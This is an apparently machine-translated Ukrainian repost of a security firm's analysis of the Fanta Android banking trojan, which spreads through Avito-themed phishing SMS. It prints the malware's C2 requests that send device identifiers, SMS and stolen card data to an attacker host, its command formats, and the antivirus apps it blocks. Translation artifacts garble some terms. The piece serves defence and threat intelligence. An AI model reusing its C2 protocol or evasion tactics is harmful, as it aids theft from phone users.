🥇Лейся, Fanta: нова тактика старенького Android-трояна ProHoster

Якось ви захочете продати що-небудь на Avito і, виклавши докладний опис свого товару (наприклад, модуль оперативної пам'яті), отримаєте таке повідомлення:

Відкривши посилання, ви побачите на увазі досить нешкідливу сторінку, що повідомляє вас, щасливого і успішного продавця, про здійснення покупки:

Після того, як ви натиснули кнопку “Продовжити”, на ваш Android-пристрій буде завантажений APK-файл з іконкою та назвою, що вселяє довіру. Ви встановили додаток, який чомусь запросив права AccessibilityService, потім з'явилися і швидко зникли кілька вікон і… Все.

Ви заходите перевірити свій баланс, але ваш банківський додаток чомусь знову запитує дані вашої картки. Після введення даних трапляється страшне: з якоїсь поки що незрозумілої для вас причини гроші починають зникати з вашого рахунку. Ви намагаєтеся вирішити проблему, але ваш телефон чинить опір: сам натискає на клавіші "Назад" і "Додому", не вимикається і не дає активувати ніякі засоби захисту. У результаті ви залишаєтеся без грошей, ваш товар не куплений, ви збентежено і задаєтеся питанням: що трапилося?

Відповідь проста: ви стали жертвою Android-трояна Fanta, сімейства Flexnet. Як же так сталося? Зараз пояснимо.

Автори: Андрій Половінкін, молодший спеціаліст з аналізу шкідливого коду, Іван Писарєв, спеціаліст з аналізу шкідливого коду

трохи статистики

Вперше про сімейство Android-троянів Flexnet стало відомо ще 2015 року. За досить тривалий період активності сімейство розширилося до кількох підвидів: Fanta, Limebot, Lipton тощо. Троян, як і пов'язана з ним інфраструктура, не стоять на місці: розробляються нові ефективні схеми розповсюдження — у нашому випадку якісні фішингові сторінки, націлені на конкретного користувача-продавця, а розробники трояна наслідують модні тренди вірусопису — додають нові функціональні можливості, що дозволяють ефективніше викрадати. гроші з заражених пристроїв та обходити механізми захисту.

Компанія, що описується в цій статті, націлена на користувачів з Росії, невелика кількість заражених пристроїв зафіксована в Україні, ще менше — в Казахстані та Білорусі.

Незважаючи на те, що Flexnet знаходиться на арені Android-троянів вже понад 4 роки і докладно вивчений багатьма дослідниками, він все ще у добрій формі. Починаючи з січня 2019 року, потенційна сума збитків становить понад 35 мільйонів рублів — і це тільки за кампаніями в Росії. У 2015 році різні версії цього Android-трояна продавалися на андеграундних форумах, там же можна було знайти і вихідний код трояна з докладним описом. А це означає, що статистика збитків у світі ще більша. Непоганий показник для такого дідуся, чи не так?

Від продажу до обману

Як видно з представленого раніше скріншоту фішингової сторінки під Інтернет-сервіс для розміщення оголошень Avito, вона готувалася під жертву. Зважаючи на все, зловмисники використовують один із парсерів Avito, що витягує телефонний номер та ім'я продавця, а також опис товару. Після розгортання сторінки та підготовки APK-файлу жертві надсилається СМС-повідомлення з його ім'ям та посиланням на фішингову сторінку, що містить опис її товару та суми, отриманої з продажу товару. Натиснувши кнопку, користувач отримує шкідливий APK-файл — Fanta.

Дослідження домену shcet491[.]ru показало, що він делегований на DNS-сервери компанії Hostinger:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Файл зони домену містить записи, що вказують на IP-адреси 31.220.23[.]236, 31.220.23[.]243 та 31.220.23[.]235. Однак, основний ресурсний запис домену (A-запис) вказує на сервер з IP-адресою 178.132.1[.]240.

IP-адреса 178.132.1[.]240 розташована в Нідерландах і належить хостеру WorldStream. IP-адреси 31.220.23[.]235, 31.220.23[.]236 та 31.220.23[.]243 розташовані у Великобританії і належать серверу віртуального хостингу HOSTINGER. Як реєстратор використовується openprov-ua. На IP-адресу 178.132.1[.]240 також резолвувалися домени:

sdelka-ru[.]ru
zboží-av[.]
av-tovar[.]
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Слід зазначити, що майже з усіх доменів були доступні посилання наступного формату:

http://(www.){0,1}<%domain%>/[0-9]{7}

Під цей шаблон також потрапляє посилання із SMS-повідомлення. За історичними даними було виявлено, що одному домену відповідає кілька посилань за вищеописаним шаблоном, що говорить про використання одного домену для поширення трояна кільком жертвам.

Забіжимо трохи вперед: як керуючий сервер завантажений за посиланням із СМС троян використовує адресу onuseseddohap[.]club. Цей домен був зареєстрований 2019-03-12, і починаючи з 2019-04-29 відбувалася взаємодія APK-додатків із даним доменом. Маючи дані, отримані з VirusTotal, всього з цим сервером взаємодіяло 109 додатків. Сам домен резолвився на IP-адресу 217.23.14[.]27, розташований у Нідерландах і належить хостеру WorldStream. Як реєстратор використовується іменник. На цю IP-адресу також резолвувалися домени bad-racoon[.]club (починаючи з 2018-09-25) та bad-racoon[.]live (Починаючи з 2018-10-25). З доменом bad-racoon[.]club взаємодіяло понад 80 APK-файлів, з bad-racoon[.]live - Більше 100.

В цілому, хід атаки виглядає так:

Що у Fanta під кришкою?

Як і багато інших андроїд-троян, Fanta здатна читати та відправляти СМС-повідомлення, здійснювати USSD-запити, демонструвати власні вікна поверх додатків (у тому числі банківських). Однак в арсеналі функціональних можливостей цього сімейства прибуло: Fanta почала використовувати Служба доступності для різних цілей: читання вмісту повідомлень інших додатків, запобігання виявлення та зупинення виконання трояна на зараженому пристрої тощо. Fanta працює на всіх версіях Android не молодше 4.4. У цій статті ми докладніше розглянемо наступний Fanta-семпл:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Відразу після запуску

Саме після запуску троян приховує свою іконку. Робота програми можлива лише в тому випадку, якщо ім'я зараженого пристрою не знаходиться у списку:

android_x86
VirtualBox
Nexus 5X(bullhead)
Nexus 5(razor)

Ця перевірка проводиться в головному сервісі трояну. MainService. При першому запуску відбувається ініціалізація конфігураційних параметрів програми значеннями за умовчанням (про формат зберігання конфігураційних даних та їх значення буде розказано пізніше), а також реєстрація нового зараженого пристрою на сервері, що управляє. На сервер буде надіслано HTTP POST-запит з типом повідомлення register_bot та інформацією про заражений пристрій (версія Android, IMEI, номер телефону, ім'я оператора та код країни, в якій зареєстрований оператор). Як керуючий сервер виступає адреса hXXp://onuseseddohap[.]club/controller.php. У відповідь сервер відправляє повідомлення, в якому містяться поля bot_id, bot_pwd, сервер — ці значення додаток зберігає як параметри CnC-сервера. Параметр сервер необов'язковий, якщо поле не було отримано: Fanta використовує адресу реєстрації hXXp://onuseseddohap[.]club/controller.php. Функція зміни CnC-адреси може бути застосована для вирішення двох завдань: рівномірного розподілу навантаження між кількома серверами (при великій кількості заражених пристроїв навантаження на неоптимізований веб-сервер може бути високим), а також для використання альтернативного сервера у разі відмови одного із CnC-серверів .

Якщо під час надсилання запиту виникла помилка, троян повторить процес реєстрації через 20 секунд.

Після успішної реєстрації пристрою Fanta виведе користувачеві наступне повідомлення:

Важливе зауваження: сервіс під назвою Безпека системи — найменування сервісу трояна і після натискання на кнопку ОК буде відкрито вікно з налаштуваннями Accessibility зараженого пристрою, де користувач повинен сам видати Accessibility-права для шкідливого сервісу:

Як тільки користувач вмикає Служба доступності, Fanta отримує доступ до вмісту вікон додатків та дій, що виробляються в них:

Відразу після отримання Accessibility-прав троян запитує права адміністратора та права на читання повідомлень:

За допомогою AccessibilityService програма імітує натискання клавіш, тим самим видаючи всі необхідні права.

Fanta створює кілька екземплярів баз даних (які будуть описані пізніше), необхідні збереження конфігураційних даних, і навіть зібраної у процесі інформації про зараженому пристрої. Для відправлення зібраної інформації троян створює завдання, що повторюється, призначену для вивантаження полів з бази даних і отримання команди від керуючого сервера. Інтервал звернення до CnC встановлюється залежно від версії Android: у разі 5.1 інтервал становитиме 10 секунд, інакше 60 секунд.

Для отримання команди Fanta здійснює запит GetTask на керуючий сервер. У відповідь CnC може надіслати одну з наступних команд:

Команда	Опис
0	Надіслати СМС-повідомлення
1	Виконати телефонний дзвінок або команду USSD
2	Оновлює параметр інтервал
3	Оновлює параметр перехоплення
6	Оновлює параметр smsManager
9	Розпочати збір СМС-повідомлень
11	Скинути телефон до заводських установок
12	Увімкнення/Вимкнення логування створення діалогових вікон

Fanta також збирає повідомлення від 70 додатків банків, систем швидких платежів та електронних гаманців та зберігає їх до бази даних.

Зберігання параметрів конфігурації

Для збереження конфігураційних параметрів Fanta використовує стандартний підхід для платформи Android. переваги-Файли. Установки будуть збережені у файлі з ім'ям налаштування. Опис параметрів, що зберігаються, знаходиться в таблиці нижче.

Ім'я	Значення за замовчуванням	Можливі значення	Опис
id	0	Ціле число	Ідентифікатор бота
сервер	hXXp://onuseseddohap[.]club/	URL	Адреса керуючого сервера
pwd	-	рядок	Пароль для сервера
інтервал	20	Ціле число	Часовий інтервал. Показує, на скільки потрібно відкласти виконання таких завдань: При надсиланні запиту про статус надісланого SMS-повідомлення Отримання нової команди від керуючого сервера
перехоплення	всі	all/telNumber	Якщо поле дорівнює рядку всі або telNumber, тоді отримане SMS-повідомлення буде перехоплено додатком і не показано користувачеві
smsManager	0	0/1	Увімкнення/вимкнення програми як одержувача СМС за замовчуванням
readDialog	false	Правда/неправда	Увімкнення/Вимкнення логування подій AccessibilityEvent

Також Fanta використовує файл smsManager:

Ім'я	Значення за замовчуванням	Можливі значення	Опис
pckg	-	рядок	Ім'я менеджера СМС-повідомлень, що використовується

Взаємодія з базами даних

У процесі роботи троян використовує дві бази даних. База даних з ім'ям a використовується для зберігання різноманітної інформації, зібраної з телефону. Друга база даних має ім'я fanta.db та використовується для збереження налаштувань, що відповідають за створення фішингових вікон, призначених для збору інформації про банківські картки.

Троян використовує базу даних а для зберігання інформації, що збирається, і логування своїх дій. Дані зберігаються у таблиці logs. Для створення таблиці використовується наступний SQL-запит:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

У базі даних міститься така інформація:

1. Логування увімкнення зараженого пристрою повідомленням Телефон увімкнувся!

2. Повідомлення від додатків. Повідомлення формується за наступним шаблоном:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Дані банківських карток з створюваних трояном фішингових форм. Параметр VIEW_NAME може бути одним із списку:

AliExpress
Avito
в Google Play
Різне <%App Name%>

Повідомлення логується у форматі:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Вхідні/вихідні SMS-повідомлення у форматі:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Інформація про пакет, який створює діалогове вікно у форматі:

(<%Package name%>)<%Package information%>

Приклад таблиці logs:

Однією з функціональних можливостей Fanta є збір інформації про банківські картки. Збір даних відбувається з допомогою створення фішингових вікон під час відкриття банківських додатків. Троян створює фішингове вікно лише один раз. Інформація про те, що вікно було показано користувачеві, зберігається у таблиці налаштування в базі даних fanta.db. Для створення бази даних використовується наступний SQL-запит:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Усі поля таблиці налаштування за замовчуванням ініціалізуються значенням 1 (створити вікно фішингу). Після того, як користувач введе дані, значення буде встановлено в 0. Приклад полів таблиці налаштування:

can_login — поле відповідає за показ форми при відкритті банківської програми
first_bank - не використовується
can_avito — поле відповідає за показ форми при відкритті програми Avito
can_ali — поле відповідає за показ форми при відкритті програми Aliexpress
can_another — поле відповідає за показ форми при відкритті будь-якої програми зі списку: Юла, Pandao, Дром Авто, Гаманець. Знижкові та бонусні картки, Aviasales, Booking, Trivago
can_card - поле відповідає за показ форми при відкритті в Google Play

Взаємодія з керуючим сервером

Мережева взаємодія з сервером, що управляє, відбувається за протоколом HTTP. Для роботи із мережею Fanta використовує популярну бібліотеку Retrofit. Запити надсилаються на адресу hXXp://onuseseddohap[.]club/controller.php. Адреса сервера може бути змінена під час реєстрації на сервері. У відповідь від сервера можуть надіслати cookie. Fanta виконує такі запити на сервер:

Реєстрація бота на сервері, що управляє, відбувається один раз при першому запуску. На сервер надсилаються такі дані про заражений пристрій:
· Печиво — отримані cookie від сервера (за замовчуванням — порожній рядок)
· режим - рядкова константа register_bot
· префікс — ціла константа 2
· version_sdk - Формується за наступним шаблоном: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· імі - IMEI зараженого пристрою
· країна — код країни, в якій зареєстровано оператора, у форматі ISO
· номер - номер телефону
· оператор - Ім'я оператора

Приклад запиту на сервер:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
У відповідь на запит сервер повинен повернути об'єкт JSON, що містить наступні параметри:
· bot_id - Ідентифікатор зараженого пристрою. Якщо bot_id дорівнюватиме 0, Fanta повторно виконає запит.
· bot_pwd - пароль для сервера.
· server - адреса сервера, що управляє. Необов'язковий параметр. Якщо параметр не вказано, буде використано адресу, збережену в програмі.

Приклад JSON-об'єкта:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Запит на отримання команди сервера. На сервер надсилаються такі дані:
· Печиво - отримані cookie від сервера
· пропозиція — id зараженого пристрою, отриманого під час надсилання запиту register_bot
· pwd -пароль для сервера
· divice_admin — поле визначає, чи отримано права адміністратора. Якщо права адміністратора були отримані, поле одно 1, інакше 0
· Доступність - Статус роботи Accessibility Service. Якщо служба була запущена, значення дорівнює 1, інакше 0
· SMS Manager — показує, чи троян увімкнено як додаток за умовчанням для отримання СМС
· екран - Відображає, в якому стані знаходиться екран. Буде встановлено значення 1якщо екран увімкнено, інакше 0;

Приклад запиту на сервер:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Залежно від команди, сервер може повернути JSON-об'єкт з різними параметрами:

· Команда Надіслати СМС-повідомлення: У параметрах міститься номер телефону, текст SMS-повідомлення та ідентифікатор повідомлення, що надсилається. Ідентифікатор використовується при надсиланні повідомлення на сервер з типом setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· Команда Виконати телефонний дзвінок або команду USSD: Номер телефону або команда надходить у тілі відповіді.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· Команда Редагувати параметр interval.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· Команда Змінити параметр intercept.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· Команда Змінити поле SmsManager.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· Команда Виконати збір СМС-повідомлень із зараженого пристрою.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· Команда Скинути телефон до заводських установок:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· Команда Редагувати параметр ReadDialog.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Надсилання повідомлення з типом setSmsStatus. Цей запит здійснюється після виконання команди Надіслати СМС-повідомлення. Запит має такий вигляд:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Надсилання вмісту бази даних. За один запит передається один рядок. На сервер надсилаються такі дані:
· Печиво - отримані cookie від сервера
· режим - рядкова константа setSaveInboxSms
· пропозиція — id зараженого пристрою, отриманого під час надсилання запиту register_bot
· текст — текст у поточному записі БД (поле d з таблиці logs в базі даних а)
· номер - Найменування поточного запису БД (поле p з таблиці logs в базі даних а)
· sms_mode - Цілочисленне значення (поле m з таблиці logs в базі даних а)

Запит має такий вигляд:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
При успішному надсиланні на сервер рядок буде видалено з таблиці. Приклад JSON-об'єкта, що повертається сервером:
```
{
    "response":[],
    "status":"ok"
}
```

Взаємодія з AccessibilityService

AccessibilityService було реалізовано для полегшення використання Android-пристроїв людьми з обмеженими можливостями. У більшості випадків для взаємодії з додатком потрібна фізична взаємодія. AccessibilityService дозволяє зробити їх програмно. Fanta використовує сервіс для створення підроблених вікон у банківських додатках та перешкод відкриття налаштувань системи та деяких додатків.

Використовуючи функціональні можливості AccessibilityService, троян відстежує зміни елементів на екрані зараженого пристрою. Як уже було раніше описано, у налаштуваннях Fanta міститься параметр, що відповідає за логування операцій з діалоговими вікнами. readDialog. Якщо цей параметр встановлено, до бази даних буде додано інформацію про назву та опис пакету, який ініціював подію. Троян виконує такі дії під час спрацювання подій:

Імітує натискання клавіш назад і додому у разі:
· якщо користувач хоче перезавантажити свій пристрій
· якщо користувач хоче видалити програму “Avito” або змінити права доступу
· якщо на сторінці є згадка про програму “Avito”
· при відкритті програми “Google Play Захист”
· при відкритті сторінок з налаштуваннями AccessibilityService
· у разі виникнення діалогового вікна “Безпека системи”
· при відкритті сторінки з налаштуваннями “Draw over other app”
· при відкритті сторінки “Програми”, “Відновлення та скидання”, “Скидання даних”, “Скидання настройок”, “Панель розробників”, “Спец. можливості”, “Спеціальні можливості”, “Особливі права”
· якщо подія була згенерована певними програмами.

Список доданих
- чоловіча
- Master Lite
- Clean Master
- Clean Master для процесора x86
- Meizu Applicatiom Permission Management
- Безпека MIUI
- Clean Master — Антивірус & Очищення кешу та сміття
- Батьківський контроль та GPS: Kaspersky SafeKids
- Антивірус Касперського AppLock & Web Security Beta
- Засіб очищення від вірусів, антивірус, очисник (MAX Security)
- Mobile AntiVirus Security PRO
- Avast антивірус & безкоштовна захист 2019
- Mobile Security Мегафон
- AVG Protection для Xperia
- Мобільна Безпека
- Malwarebytes антивірус & захист
- Антивірус на Андроїд 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG антивірус для планшета Huawei System Manager
- Спеціальні можливості Samsung
- Samsung Smart Manager
- Майстер безпеки
- Бустер швидкості
- Dr.Web
- Dr.Web Security Space
- Центр мобільного керування Dr.Web
- Dr.Web Security Space Life
- Центр мобільного керування Dr.Web
- Антивірусна та мобільна безпека
- Kaspersky Internet Security: Антивірус і Захист
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - захист та управління
- AVG Антивірус безкоштовно 2019 року - Захист для Андроїд
- Android антивірус
- Norton Mobile Security та антивірус
- Антивірус, брандмауер, VPN, мобільна безпека
- Mobile Security: антивірус, VPN, захист від крадіжки
- Антивірус для Андроїда
Якщо при надсиланні SMS-повідомлення на короткий номер запитується дозвіл, Fanta імітує натискання на checkbox Запам'ятати вибір та кнопку Відправити.
При спробі відібрати у трояна права адміністратора блокує екран телефону.
Перешкоджає додаванню нових адміністраторів.
Якщо антивірусний додаток dr.web виявило загрозу, Fanta імітує натискання на кнопку ігнорувати.
Троян імітує натискання на кнопку назад і додому, якщо подія була згенерована програмою Догляд за пристроєм Samsung.
Fanta створює фішингові вікна з формами для введення інформації про банківські картки, якщо було запущено програму зі списку, що включає близько 30 різних Інтернет-сервісів. Серед них: AliExpress, Booking, Avito, Компонент Google Play Market, Pandao, Дром Авто та ін.

Фішингові форми

Fanta аналізує, які програми запускаються на зараженому пристрої. Якщо було відкрито додаток, що цікавить, троян демонструє фішингове вікно поверх всіх інших, яке являє собою форму для введення інформації про банківську картку. Користувачеві необхідно ввести такі дані:
- Номер картки
- Термін дії карти
- CVV
- Ім'я власника картки (не для всіх банків)
Залежно від запущеної програми будуть продемонстровані різні вікна фішингу. Далі будуть представлені приклади деяких із них:

Аліекспресс:

Авіто:

Для деяких інших програм, наприклад Google Play Market, Aviasales, Pandao, Booking, Trivago:

Як все було насправді

На щастя, людина, яка отримала описане на початку статті SMS-повідомлення, виявилася фахівцем у галузі кібербезпеки. Тому реальна, не режисерська версія відрізняється від розказаної раніше: людина отримала цікаве СМС, після чого віддала його команді Group-IB Threat Hunting Intelligence. Результат атаки – дана стаття. Щаслива кінцівка, чи не так? Однак, далеко не всі історії закінчуються так вдало, і щоб ваша не була схожа на режисерську версію зі втратою грошей, у більшості випадків достатньо дотримуватися наступних, давно описаних правил:
- не встановлювати програми для мобільного пристрою з ОС Android з будь-яких джерел, крім Google Play
- при встановленні програми звертати особливу увагу на права, що запитуються додатком права
- звертати увагу на розширення завантажуваних файлів
- регулярно встановлювати оновлення ОС Android
- не відвідувати підозрілі ресурси та не завантажувати звідти файли
- не переходити за посиланнями, отриманими у SMS-повідомленнях.

Джерело: habr.com

Лійся, Fanta: нова тактика старого Android-трояна